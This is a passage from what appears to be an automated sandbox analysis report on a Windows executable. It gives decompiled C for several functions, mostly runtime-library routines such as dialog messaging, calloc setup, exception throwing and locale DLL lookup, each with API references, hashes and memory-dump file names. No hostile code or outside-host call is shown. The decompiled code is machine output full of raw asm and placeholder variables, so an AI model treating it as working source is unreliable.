							continue;
						}
						break;
					}
					if(_t34 != 0x401) {
						if(_t34 == 0x403) {
							_t34 = 0x143;
						}
						if(_t34 != 0x401) {
							if(_t34 == 0x180 || _t34 == 0x143) {
								L14:
								if(SendDlgItemMessageA( *(_t55 + 0x20), _t49 & 0x0000ffff, _t34 & 0x0000ffff, 0, _t63) == 0xffffffff) {
									_v8 = _v8 & 0x00000000;
								}
							}
							goto L16;
						} else {
							goto L9;
						}
					}
					_t34 = 0x180;
					goto L14;
				}
				_pop(_t47);
				if(_v8 == 0) {
					goto L19;
				}
				goto L18;
			}

APIs

SendDlgItemMessageA.USER32(?,?,00000401,00000000,00000001), ref: 00413632
SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 00413667

Strings

GAw, xrefs: 004135AD

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMessageSend
String ID: GAw
API String ID: 3015471070-2039021800
Opcode ID: 2861639ca7f8e0368459d35f1ed22b7922ab70711588d94c5cd5cbf29ecb98ae
Instruction ID: fe52b6aa2a3dac104b3185280c56478472f621a5e0287daddbe630918052ee70
Opcode Fuzzy Hash: 2861639ca7f8e0368459d35f1ed22b7922ab70711588d94c5cd5cbf29ecb98ae
Instruction Fuzzy Hash: F5318075900224BBDF209E58C840BFE77B9EB14325F504266F991A73D0C7789F82DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041D2AD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E0041D2AD(intOrPtr __ebx, signed int __edx, intOrPtr* _a4, char _a8, void* _a12, signed int _a16) {
				signed int _v8;
				char _v24;
				signed int _v28;
				char _v32;
				void* _v36;
				intOrPtr _v40;
				signed int _v44;
				void* _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed int _t36;
				intOrPtr* _t38;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr* _t43;
				signed int _t45;
				intOrPtr _t46;
				intOrPtr* _t47;
				signed int _t51;
				signed int _t57;
				intOrPtr _t58;
				signed int _t59;
				char _t67;
				signed int _t68;

				_t61 = __edx;
				_t50 = __ebx;
				_t36 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t36 ^ _t68;
				_t38 = _a4;
				_t67 = _a8;
				_t66 = _a12;
				_v48 = _t66;
				if(_t38 != 0) {
					if(_t66 == 0) {
						goto L1;
					}
					_v44 = _v44 & 0x00000000;
					_t61 =  &_v44;
					_t41 =  *((intOrPtr*)( *_t38))(_t38, 0x43f3dc,  &_v44, __ebx);
					_t51 = _a16;
					_v40 = _t41;
					if(_t51 > 0) {
						_t59 = _t51;
						memset(_t66, 0, _t59 << 2);
						_t66 = _t66 + _t59;
					}
					if(_v40 < 0) {
						L15:
						_t43 = _v44;
						_pop(_t50);
						if(_t43 != 0) {
							 *((intOrPtr*)( *_t43 + 8))(_t43);
						}
						_t39 = _v40;
						L18:
						return E0042569C(_t39, _t50, _v8 ^ _t68, _t61, _t66, _t67);
					} else {
						_v32 = _t67;
						_v28 = _t51;
						_t67 = 0x442568;
						_t66 =  &_v24;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t61 =  &_v32;
						_v52 = 0;
						_v36 = 0;
						_t45 = _v44;
						asm("movsd");
						_t46 =  *((intOrPtr*)( *_t45 + 0xc))(_t45, 1,  &_v32,  &_v52,  &_v36);
						_v40 = _t46;
						_t47 = _v36;
						if(_t46 < 0) {
							L14:
							__imp__CoTaskMemFree(_t47);
							goto L15;
						}
						_t57 = 0;
						_t67 = 0;
						while(1) {
							_t61 =  *(_t47 + 4);
							if(_t61 >= _t51) {
								_t61 = _t51;
							}
							if(_t57 >= _t61) {
								break;
							}
							_t66 = _v48;
							 *((intOrPtr*)(_v48 + _t57 * 4)) =  *((short*)( *_t47 + _t67 + 0x2c));
							_t57 = _t57 + 1;
							_t67 = _t67 + 0x34;
						}
						_t58 =  *_t47;
						if(_t58 != 0) {
							__imp__CoTaskMemFree(_t58);
							_t47 = _v36;
						}
						goto L14;
					}
				}
				L1:
				_t39 = 0x80004005;
				goto L18;
			}

APIs

CoTaskMemFree.OLE32(00000000), ref: 0041D36B
CoTaskMemFree.OLE32(?), ref: 0041D375

Strings

h%D, xrefs: 0041D30D

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeTask
String ID: h%D
API String ID: 734271698-549918436
Opcode ID: 80a06b78ca4ceb4e93cb586a1ec7612c3d8feb84411cb74e6504a56ef66e7d8b
Instruction ID: 1090c3e2d0adbeed171144900c2e44012caec48972a6250360b978ace9dbfbe8
Opcode Fuzzy Hash: 80a06b78ca4ceb4e93cb586a1ec7612c3d8feb84411cb74e6504a56ef66e7d8b
Instruction Fuzzy Hash: DC3150B5E006089FCB00CFA8D8849EEB7F5BF89700B14846AE816FB210D779E941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00433F4D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00433F4D() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x4547e0;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x4547e0 = _t5;
				}
				_t6 = E0042AD31(_t5, 4);
				 *0x4537d4 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x450050;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x4502d0) {
							break;
						}
						_t6 =  *0x4537d4; // 0xf91d48
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x450060;
					do {
						_t10 =  *((intOrPtr*)((_t20 & 0x0000001f) * 0x28 +  *((intOrPtr*)(0x454800 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x4500c0);
					return 0;
				} else {
					 *0x4547e0 = _t26;
					_t6 = E0042AD31(_t26, 4);
					 *0x4537d4 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

APIs

__calloc_crt.LIBCMT ref: 00433F6F
__calloc_crt.LIBCMT ref: 00433F88

Strings

7E, xrefs: 00433F9F

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __calloc_crt
String ID: 7E
API String ID: 3494438863-1921024439
Opcode ID: 67a570615fac86b96e42a423bc009969f8f9ea152db8d64f80f8483bd9cb412b
Instruction ID: a0b7be4d21194713e048398d7ce777f4146060a70c2698c0156d40b08fff5919
Opcode Fuzzy Hash: 67a570615fac86b96e42a423bc009969f8f9ea152db8d64f80f8483bd9cb412b
Instruction Fuzzy Hash: 9411E371B093101BE7248E2DBC4076662A1EB8D72BFA4553BF901CB3D2D738DE81464C

Uniqueness

Uniqueness Score: -1.00%

Function 0041357C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041357C(signed short __ecx, void* __eflags, signed short* _a4) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed short _v20;
				signed short* _v48;
				void _v52;
				void* _v56;
				void* __ebx;
				void* __ebp;
				signed short _t35;
				signed short _t36;
				void* _t49;
				intOrPtr _t50;
				signed int _t52;
				signed short _t58;
				signed short* _t63;
				signed short* _t66;
				signed short* _t68;
				long _t69;
				void* _t71;
				void* _t73;
				void* _t74;

				_t51 = __ecx;
				E00420A14(1);
				E00429326(0, 0);
				asm("int3");
				_t71 = _t73;
				_t74 = _t73 - 0x34;
				_t63 = _a4;
				_t58 = _t51;
				_v12 = _t58;
				_v8 = 1;
				if(_t63 == 0) {
					L19:
					E0041176E(_t49, _t51, _t56,  *(_t58 + 0x20), 0x364, 0, 0, 0, 0);
				} else {
					_push(_t49);
					_t50 = __imp__SendDlgItemMessageA; // 0x774147e0
					while(1) {
						_t35 =  *_t63 & 0x0000ffff;
						if(_t35 == 0) {
							break;
						}
						_t66 =  &(_t63[1]);
						_t51 = _t35 & 0x0000ffff;
						_t36 =  *_t66 & 0x0000ffff;
						_t68 =  &(_t66[1]);
						_t56 =  *_t68;
						_t69 =  &(_t68[2]);
						_v16 = _t51;
						_v20 =  *_t68;
						if(_t36 == 0x1234) {
							L10:
							_t52 = 8;
							memset( &_v52, 0, _t52 << 2);
							_t74 = _t74 + 0xc;
							_v52 = _v52 | 0xffffffff;
							_v56 = 1;
							E00401EE0(_t50, _t71, _t69);
							_v48 = _a4;
							if(SendDlgItemMessageA( *(_v12 + 0x20), _v16 & 0x0000ffff, 0x401, 0,  &_v56) == 0xffffffff) {
								_v8 = _v8 & 0x00000000;
							}
							_t51 =  &(_a4[0xfffffffffffffff8]);
							E00401E60( &(_a4[0xfffffffffffffff8]), _t56);
							_t58 = _v12;
						} else {
							if(_t36 != 0x401) {
								if(_t36 == 0x403) {
									_t36 = 0x143;
								}
								if(_t36 != 0x401) {
									if(_t36 == 0x180 || _t36 == 0x143) {
										goto L15;
									}
								} else {
									goto L10;
								}
							} else {
								_t36 = 0x180;
								L15:
								if(SendDlgItemMessageA( *(_t58 + 0x20), _t51 & 0x0000ffff, _t36 & 0x0000ffff, 0, _t69) == 0xffffffff) {
									_v8 = _v8 & 0x00000000;
								}
							}
						}
						_t63 = _t69 + _v20;
						if(_v8 != 0) {
							continue;
						}
						break;
					}
					_pop(_t49);
					if(_v8 != 0) {
						goto L19;
					}
				}
				return _v8;
			}

APIs

Part of subcall function 00420A14: LeaveCriticalSection.KERNEL32(?,00416E37,00000010,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00420A2B

__CxxThrowException@8.LIBCMT ref: 00413587

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00429366

SendDlgItemMessageA.USER32(?,?,00000401,00000000,00000001), ref: 00413632
SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 00413667

Strings

GAw, xrefs: 004135AD

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMessageSend$CriticalExceptionException@8LeaveRaiseSectionThrow
String ID: GAw
API String ID: 1466613979-2039021800
Opcode ID: 24c4a0009455be0a1232256184d56ead3422bda4f3ec779fe6ae7eb652849d97
Instruction ID: 049c3642c56f9315d2df8886d0c18884799de56e1e188bdf1557974ba1594a51
Opcode Fuzzy Hash: 24c4a0009455be0a1232256184d56ead3422bda4f3ec779fe6ae7eb652849d97
Instruction Fuzzy Hash: 7611B675900224BBEB249E59DC40BFAB3E8EB14715F504157FD91E72D0C3B89E81D6A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040AFB5(intOrPtr __ebx, void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t33;
				signed int _t36;

				_t21 = __ebx;
				_t11 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E0040AA60( &_v280, _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E0040ACCE(__ebx,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E0042569C(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0040AFDB
PathFindExtensionA.SHLWAPI(?), ref: 0040AFF1

Part of subcall function 0040AA60: _strcpy_s.LIBCMT ref: 0040AA6C

Part of subcall function 0040ACCE: __EH_prolog3.LIBCMT ref: 0040ACED
Part of subcall function 0040ACCE: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 0040AD0E
Part of subcall function 0040ACCE: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0040AD1F
Part of subcall function 0040ACCE: ConvertDefaultLocale.KERNEL32(?), ref: 0040AD55
Part of subcall function 0040ACCE: ConvertDefaultLocale.KERNEL32(?), ref: 0040AD5D
Part of subcall function 0040ACCE: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0040AD71
Part of subcall function 0040ACCE: ConvertDefaultLocale.KERNEL32(?), ref: 0040AD95
Part of subcall function 0040ACCE: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040AD9B
Part of subcall function 0040ACCE: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040ADD4

Strings

%s.dll, xrefs: 0040AFF7

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 9b7c228b595554738f03df3acb22f535725a81e79eb3f780f37b4b20208d7fc3
Instruction ID: c1f34b6123e9bc8b8de62e29be8e87cb1c3f3761e615654107909229194c5589
Opcode Fuzzy Hash: 9b7c228b595554738f03df3acb22f535725a81e79eb3f780f37b4b20208d7fc3
Instruction Fuzzy Hash: 9C017971E00218ABDB18EB64ED559EFB3BDDF04B04F4501BAA907E3180EB749E448A99

Uniqueness

Uniqueness Score: -1.00%

Function 00439550, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00439550(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __edx, intOrPtr __edi, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t30;
				intOrPtr _t35;
				intOrPtr* _t38;
				intOrPtr _t39;
				signed int _t40;
				void* _t42;

				_t36 = __edi;
				_t35 = __edx;
				_t30 = __ebx;
				_t40 = _t42 - 0x78;
				_t19 =  *0x44f5d0; // 0x8e7de579
				 *(_t40 + 0x74) = _t19 ^ _t40;
				_t38 = __ecx;
				E004394FA(__ecx);
				 *((intOrPtr*)(_t38 + 8)) = 0x400000;
				 *((intOrPtr*)(_t38 + 4)) = 0x400000;
				 *_t38 = 0x3c;
				 *((char*)(_t38 + 0xc)) = 0;
				E004277B0(__edi, _t40 - 0x20, 0, 0x94);
				 *(_t40 - 0x20) = 0x94;
				GetVersionExA(_t40 - 0x20);
				if( *((intOrPtr*)(_t40 - 0x10)) != 2) {
					__eflags =  *((intOrPtr*)(_t40 - 0x10)) - 1;
					if(__eflags == 0) {
						__eflags =  *((intOrPtr*)(_t40 - 0x1c)) - 4;
						if(__eflags > 0) {
							goto L7;
						} else {
							if(__eflags == 0) {
								__eflags =  *((intOrPtr*)(_t40 - 0x18));
								if(__eflags > 0) {
									goto L7;
								}
							}
						}
					}
				} else {
					_t48 =  *((intOrPtr*)(_t40 - 0x1c)) - 5;
					if( *((intOrPtr*)(_t40 - 0x1c)) >= 5) {
						L7:
						 *((char*)(_t38 + 0xc)) = 1;
					}
				}
				 *((intOrPtr*)(_t38 + 0x10)) = 0x800;
				 *((intOrPtr*)(_t38 + 0x14)) = 0x4425e0;
				if(E004393EB(_t38 + 0x18, _t48) < 0) {
					 *0x4537cc = 1;
				}
				_pop(_t39);
				return E0042569C(_t38, _t30,  *(_t40 + 0x74) ^ _t40, _t35, _t36, _t39);
			}

APIs

_memset.LIBCMT ref: 0043958D
GetVersionExA.KERNEL32(?), ref: 004395A0

Strings

%D, xrefs: 004395D6

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Version_memset
String ID: %D
API String ID: 963298953-2104738290
Opcode ID: 9cdfd29e3b7ccd4d4a6ad3a815523b1a7655234fab9f268185b4d07bcdb5a187
Instruction ID: 6327312a4b0d9c603f1ca1a29768281a6f47a2dcfe8301600776b71324c8d170
Opcode Fuzzy Hash: 9cdfd29e3b7ccd4d4a6ad3a815523b1a7655234fab9f268185b4d07bcdb5a187
Instruction Fuzzy Hash: 2111B6B1900709DEEF31DF65D80479EB7F0AB09708F00892FD45192281E7BC9948CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404AC3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00404AC3(signed int __eax, signed int __ecx, char _a4) {
				char _v0;
				intOrPtr _v8;
				intOrPtr* __esi;

				if((__eax | 0xffffffff) / __ecx >= 0x1c) {
					return E0040A3C7(__ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx, __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx);
				} else {
					__eax = __esp;
					__ecx =  &_a4;
					_v0 = 0;
					__eax = E00425E86( &_a4, __edx, __esp);
					__ecx =  &_v0;
					_v0 = 0x44257c;
					__eax = E00429326( &_v0, 0x44ae50);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__eax = _v8;
					__esi = __ecx;
					__eax = E00404B20(_v8);
					 *__esi = 0x442594;
					__eax = __esi;
					__esi = __esi;
					return __esi;
				}
			}

APIs

std::exception::exception.LIBCMT ref: 00404ADF

Part of subcall function 00425E86: _strlen.LIBCMT ref: 00425E9C
Part of subcall function 00425E86: _malloc.LIBCMT ref: 00425EA5
Part of subcall function 00425E86: _strcpy_s.LIBCMT ref: 00425EB7

__CxxThrowException@8.LIBCMT ref: 00404AF6

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00429366

Part of subcall function 00404B20: std::exception::exception.LIBCMT ref: 00404B4E

Strings

|%D, xrefs: 00404AEE

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$ExceptionException@8RaiseThrow_malloc_strcpy_s_strlen
String ID: |%D
API String ID: 2865764815-1005067592
Opcode ID: c8d402a08d4f9bd314109da3c77bef6397ab4d3150a18583c0e5fbb983926d01
Instruction ID: 2937444950d94432ab7b04c2b8a0213aa74f47cbb9dc67bd430071b9e319529b
Opcode Fuzzy Hash: c8d402a08d4f9bd314109da3c77bef6397ab4d3150a18583c0e5fbb983926d01
Instruction Fuzzy Hash: D8F0B4F1A442106BE308EF65ED01B4B76959FD8324F94CE2FB19882184EB7CD9248B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404E39, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00404E39(signed int __eax, void* __ebx, signed int __ecx, void* __esi, void* __ebp, signed int _a4) {
				signed int _v0;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int __edi;
				signed int _t41;

				_t41 = __eax | 0xffffffff;
				_t54 = _t41 / __ecx - 2;
				if(_t41 / __ecx >= 2) {
					return E0040A3C7(_t54, __ecx + __ecx);
				} else {
					__eax = __esp;
					__ecx =  &_a4;
					_v0 = 0;
					__eax = E00425E86( &_a4, __edx, __esp);
					__ecx =  &_v0;
					_v0 = 0x44257c;
					__eax = E00429326( &_v0, 0x44ae50);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__ecx = _a4;
					__esp = __esp - 0xc;
					__eflags = __ecx;
					if(__ecx > 0) {
						__eax = __eax | 0xffffffff;
						__edx = 0;
						_t12 = __eax % __ecx;
						__eax = __eax / __ecx;
						__edx = _t12;
						__eflags = __eax - 1;
						if(__eflags >= 0) {
							goto L5;
						} else {
							__eax =  &_a4;
							__ecx =  &_v12;
							_a4 = 0;
							__eax = E00425E86( &_v12, __edx,  &_a4);
							__ecx =  &_v16;
							_v16 = 0x44257c;
							__eax = E00429326( &_v16, 0x44ae50);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							__esp = __esp - 8;
							__eflags =  *(__esi + 0x14) - __ebx;
							_push(__edi);
							__edi = __eax;
							if(__eflags < 0) {
								__eax = E00439296(__ebx, __edi, __esi, __eflags);
							}
							__eax =  *(__esi + 0x14);
							__eax =  *(__esi + 0x14) - __ebx;
							__eflags = __eax - __edi;
							if(__eax < __edi) {
								__edi = __eax;
							}
							__eflags = __edi;
							if(__edi > 0) {
								__ecx =  *(__esi + 0x18);
								__eflags = __ecx - 8;
								_push(__ebp);
								__ebp = __esi + 4;
								if(__ecx < 8) {
									_v20 = __ebp;
								} else {
									__edx = _v0;
									_v20 = _v0;
								}
								__eflags = __ecx - 8;
								if(__ecx < 8) {
									_v16 = __ebp;
								} else {
									__edx = _v0;
									_v16 = _v0;
								}
								__edx = _v20;
								__eax = __eax + __eax;
								__ebx + __edi = _v20 + (__ebx + __edi) * 2;
								__ecx = __ecx + __ecx;
								__ecx = _v16;
								__edx = _v16 + __ebx * 2;
								__eax =  *(__esi + 0x14);
								__eax =  *(__esi + 0x14) - __edi;
								__eflags =  *(__esi + 0x18) - 8;
								 *(__esi + 0x14) = __eax;
								if( *(__esi + 0x18) >= 8) {
									__ebp = _v0;
								}
								 *((short*)(__ebp + __eax * 2)) = 0;
								_pop(__ebp);
							}
							__eax = __esi;
							_pop(__edi);
							__esp = __esp + 8;
							return __esi;
						}
					} else {
						__ecx = 0;
						__eflags = 0;
						L5:
						__eax = E0040A3C7(__eflags, __ecx);
						__esp = __esp + 0xc;
						return __eax;
					}
				}
			}

APIs

std::exception::exception.LIBCMT ref: 00404E55

Part of subcall function 00425E86: _strlen.LIBCMT ref: 00425E9C
Part of subcall function 00425E86: _malloc.LIBCMT ref: 00425EA5
Part of subcall function 00425E86: _strcpy_s.LIBCMT ref: 00425EB7

__CxxThrowException@8.LIBCMT ref: 00404E6C

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00429366

Strings

|%D, xrefs: 00404E64

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionException@8RaiseThrow_malloc_strcpy_s_strlenstd::exception::exception
String ID: |%D
API String ID: 3160936874-1005067592
Opcode ID: ffeabc6474023770f937e3146c70418d5d3e7fb55c71d9da686a4fea33b75d77
Instruction ID: f07a7fc72b55d604720044e86a381605f99391d8e697b7815cbd527ead3d1c55
Opcode Fuzzy Hash: ffeabc6474023770f937e3146c70418d5d3e7fb55c71d9da686a4fea33b75d77
Instruction Fuzzy Hash: CDE026F09143006BD308EF61D841A0B33A5AFD4318F90CE1FF4A9810D1EBB8D2188A1F

Uniqueness

Uniqueness Score: -1.00%

Function 00404E80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404E80(signed int __ebx, void* __esi, void* __ebp, signed int _a4) {
				char _v12;
				void* _v16;
				intOrPtr* _v20;
				void* __edi;
				signed int _t31;
				signed int _t32;
				void* _t37;
				void* _t39;
				signed int _t47;
				signed int _t49;
				signed int _t50;
				intOrPtr _t53;
				signed int _t58;
				void* _t64;
				void* _t66;
				void* _t67;
				intOrPtr* _t68;
				void* _t70;
				void* _t71;
				void* _t74;

				_t67 = __ebp;
				_t66 = __esi;
				_t49 = __ebx;
				_t50 = _a4;
				_t71 = _t70 - 0xc;
				if(_t50 > 0) {
					_t32 = _t31 | 0xffffffff;
					_t58 = _t32 % _t50;
					__eflags = _t32 / _t50 - 1;
					if(__eflags >= 0) {
						goto L2;
					} else {
